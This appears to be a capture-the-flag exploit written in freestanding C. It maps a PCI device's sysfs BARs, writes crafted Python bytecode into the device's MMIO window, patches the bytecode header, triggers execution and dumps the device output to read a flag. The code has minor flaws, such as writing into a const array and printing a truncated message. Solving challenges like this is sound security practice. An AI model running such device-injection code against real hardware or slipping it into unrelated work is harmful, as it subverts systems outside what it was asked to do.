// Day 9

// gcc -nostdlib -static mmio_loader.c -o mmio_loader

// Minimal integer aliases used throughout this file (no libc headers are
// included in the visible source).
// NOTE(review): the names imply fixed widths, which hold on the x86-64 Linux
// (LP64) ABI this file targets — confirm before porting.
typedef unsigned long ulong;       // register-sized value for syscall arguments
typedef unsigned long long u64;    // 64-bit unsigned
typedef unsigned int u32;          // 32-bit unsigned
typedef unsigned char u8;          // raw byte

// Linux x86-64 syscall numbers; the wrappers in this file load them into rax
// before executing the `syscall` instruction.
#define SYS_OPENAT  257
#define SYS_MMAP    9
#define SYS_WRITE   1
#define SYS_EXIT    60

// ------------------- syscalls ------------------------

static inline long sys_openat(int dirfd, const char *path, int flags) {
    long ret;
    asm volatile ("syscall"
        : "=a"(ret)
        : "0"(SYS_OPENAT), "D"(dirfd), "S"(path), "d"(flags)
        : "rcx", "r11", "memory");
    return ret;
}

/*
 * Raw mmap syscall.
 *
 * addr, len, prot, flags, fd, off are passed through unchanged as the six
 * syscall arguments (rdi, rsi, rdx, r10, r8, r9).
 *
 * Returns the kernel's raw result as a long: the mapped address on success or
 * a negative errno value on failure. Callers must cast it to a pointer
 * themselves.
 */
static inline long sys_mmap(void *addr, ulong len, ulong prot,
                            ulong flags, ulong fd, ulong off) {
    /* rax carries the syscall number in and the result out. */
    long result = SYS_MMAP;

    /* r10/r8/r9 have no dedicated constraint letters, so arguments 4-6 are
     * pinned with explicit register variables immediately before the asm. */
    register ulong arg_flags __asm__("r10") = flags;
    register ulong arg_fd    __asm__("r8")  = fd;
    register ulong arg_off   __asm__("r9")  = off;

    __asm__ __volatile__(
        "syscall"
        : "+a"(result)
        : "D"(addr), "S"(len), "d"(prot),
          "r"(arg_flags), "r"(arg_fd), "r"(arg_off)
        : "rcx", "r11", "memory"   /* the syscall instruction overwrites rcx and r11 */
    );
    return result;
}

/*
 * Raw write syscall.
 *
 * fd  : destination file descriptor
 * buf : first byte to write
 * len : number of bytes to write; deliberately ulong rather than int so the
 *       full register is defined when passed to the kernel
 *
 * Returns the kernel's raw result: the number of bytes written, or a negative
 * errno value on failure.
 */
static inline long sys_write(int fd, const void *buf, ulong len) {
    /* rax carries the syscall number in and the result out. */
    long rax = SYS_WRITE;

    __asm__ __volatile__(
        "syscall"
        : "+a"(rax)
        : "D"(fd), "S"(buf), "d"(len)
        : "rcx", "r11", "memory"   /* the syscall instruction overwrites rcx and r11 */
    );
    return rax;
}

static inline void sys_exit(int code) {
    asm volatile(
        "syscall"
        :
        : "a"(SYS_EXIT), "D"(code)
        : "rcx", "r11", "memory"
    );
}

// ------------------- utils ------------------------


// ------------------- main ------------------------

// sysfs file opened and mapped by _start as the control/payload window
// (registers and payload are written through this mapping).
// NOTE(review): presumably BAR 0 of PCI device 0000:00:03.0 — confirm the
// device address on the target machine.
static const char path[] =
"/sys/bus/pci/devices/0000:00:03.0/resource0";

// sysfs file opened and mapped by _start as the region whose first bytes are
// dumped to fd 1 after execution is triggered.
// NOTE(review): presumably BAR 1 of the same device — confirm.
static const char path1[] =
"/sys/bus/pci/devices/0000:00:03.0/resource1";

void _start() {

    long fd = sys_openat(-100, path, 2);   // O_RDWR
    if (fd < 0) sys_exit(1);

    long fd1 = sys_openat(-100, path1, 2);   // O_RDWR
    if (fd1 < 0) sys_exit(1);
    // ****** FIXED MMAP FLAGS ******
    // You used MAP_PRIVATE | MAP_SHARED → illegal → mmap failure → SEGFAULT
    //
    // Correct for PCI BAR mapping:
    //      prot = PROT_READ|PROT_WRITE = 3
    //      flags = MAP_SHARED | MAP_FIXED? no.
    //      flags = MAP_SHARED | MAP_FILE = 1 | 0x20
    //
    // For PCI BAR, MAP_SHARED (1) is enough.

    u8 *mmio = (u8*)sys_mmap(
        0,          // addr
        0x1000,     // len
        1 | 2,      // prot = PROT_READ|PROT_WRITE
        1,          // flags = MAP_SHARED
        fd,         // file descriptor
        0           // offset 0
    );

    if (mmio == (void*)-1 || mmio == 0)
        sys_exit(18);


    u8 *stdout = (u8*)sys_mmap(
        0,          // addr
        0x1000,     // len
        1 | 2,      // prot = PROT_READ|PROT_WRITE
        1,          // flags = MAP_SHARED
        fd1,         // file descriptor
        0           // offset 0
    );

    if (stdout == (void*)-1 || stdout == 0)
        sys_exit(18);

    // ------------------------------
    // Send test Python bytecode
    // ------------------------------

    u8 patch_bytes[] = {
    0xf3,0x0d,0x0d,0x0a,0x03,0x00,0x00,0x00,0x20,0x2a,0xf1,0xcf,0x3a,0x47,0xf4,0xcd
};

    const u8 code[] = { 0xf3,0x0d,0x0d,0x0a,0x00,0x00,0x00,0x00,0x79,0xca,0x38,0x69,0x66,0x00,0x00,0x00,0xe3,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf3,0x5a,0x00,0x00,0x00,0x95,0x00,0x1e,0x00,0x53,0x00,0x53,0x01,0x4b,0x00,0x72,0x00,0x5c,0x01,0x22,0x00,0x5c,0x00,0x52,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x35,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x67,0x01,0x21,0x00,0x5c,0x03,0x07,0x00,0x61,0x0b,0x00,0x00,0x20,0x00,0x5c,0x01,0x22,0x00,0x53,0x02,0x35,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x1f,0x00,0x67,0x01,0x66,0x00,0x3d,0x03,0x1f,0x00,0x66,0x01,0x29,0x03,0xe9,0x00,0x00,0x00,0x00,0x4e,0x7a,0x17,0x4e,0x6f,0x20,0x67,0x69,0x66,0x74,0x73,0x20,0x61,0x72,0x65,0x20,0x61,0x76,0x61,0x69,0x6c,0x61,0x62,0x6c,0x65,0x21,0x29,0x04,0xda,0x05,0x67,0x69,0x66,0x74,0x73,0xda,0x05,0x70,0x72,0x69,0x6e,0x74,0xda,0x04,0x66,0x6c,0x61,0x67,0xda,0x09,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0xa9,0x00,0xf3,0x00,0x00,0x00,0x00,0xda,0x04,0x6f,0x2e,0x70,0x79,0xda,0x08,0x3c,0x6d,0x6f,0x64,0x75,0x6c,0x65,0x3e,0x72,0x0a,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x73,0x31,0x00,0x00,0x00,0xf0,0x03,0x01,0x01,0x01,0xf0,0x02,0x04,0x01,0x25,0xdb,0x04,0x10,0xd9,0x04,0x09,0x88,0x25,0x8f,0x2a,0x89,0x2a,0xd5,0x04,0x15,0xf8,0xd8,0x07,0x10,0xf3,0x00,0x01,0x01,0x25,0xd9,0x04,0x09,0xd0,0x0a,0x23,0xd6,0x04,0x24,0xf0,0x03,0x01,0x01,0x25,0xfa,0x73,0x0c,0x00,0x00,0x00,0x82,0x16,0x19,0x00,0x99,0x0e,0x2a,0x03,0xa9,0x01,0x2a,0x03};
    
    const u32 code_len = sizeof(code);
    


    u64 val = 0xf0a0101a75bc9dd3ULL;
    *(u64*)(code + 0x08) = val;

    for (u32 i = 0; i < code_len; i++)
        mmio[0x100 + i] = code[i];

  

    // scratch register
    *(u32*)(mmio + 0x04) = code_len;

    // code length
    *(u32*)(mmio + 0x10) = code_len;

    // trigger execution
    *(u32*)(mmio + 0x0C) = 1;


    char* msg = "MMIO write complete\n";
    sys_write(1, msg, 11);


    for (int i=0; i < 100; i++) {
        char magic = *(char*)(stdout + i);
        sys_write(1, &magic, 1);
    }
    

    




    // verify device responds
    // print_hex32(*(u32*)(mmio + 0x00));   // should print PYPU magic


    sys_exit(0);
}